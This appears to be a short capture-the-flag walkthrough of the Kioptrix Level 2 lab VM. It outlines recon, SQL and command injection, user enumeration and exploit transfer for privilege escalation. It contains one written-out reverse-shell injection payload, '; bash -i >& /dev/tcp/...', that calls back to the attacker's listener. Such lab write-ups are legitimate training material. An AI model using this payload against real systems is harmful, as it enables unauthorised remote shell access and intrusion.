Kioptrix Level 2
Kioptrix Level 2 Walkthrough
Tools:
Nmap, Nikto, Dirb, Netcat, Searchsploit
Lab setup
Vulnerable Kioptrix 2 VM
Recon
Nmap
A quick scan with Nmap to identify open ports on the target.
Nikto
Nikto scan to identify basic information regarding web server running on a port 80.
Dirb
Bruteforcing webserver directories
SQL Injection Exploitation
SQL Injection to gain access
SQL Injection/Admin access
Command Injection
Command Injection
Web server enumeration injecting commands
Database name identified:
- webapp
Dumping accounts/users from the webserver
- john
- harold
Netcat
Setting up Netcat listener and enumerating web server in order to perform privilege escalation
Connecting to my Netcat listener
; bash -i >& /dev/tcp/10.0.2.15/1337 0>&1
Searchsploit
Looking for potential exploits on the internet
Looking for locally available exploits
Transfering exploit (9545.c)from Kali machine to the target machine
Setting up the local webserver
Transfering exploit from local database to desktop
It is important to note that on our target machine we need to change directory to tmp (write/permissions access), then we can grab the exploit with wget command
Privilege Escalation
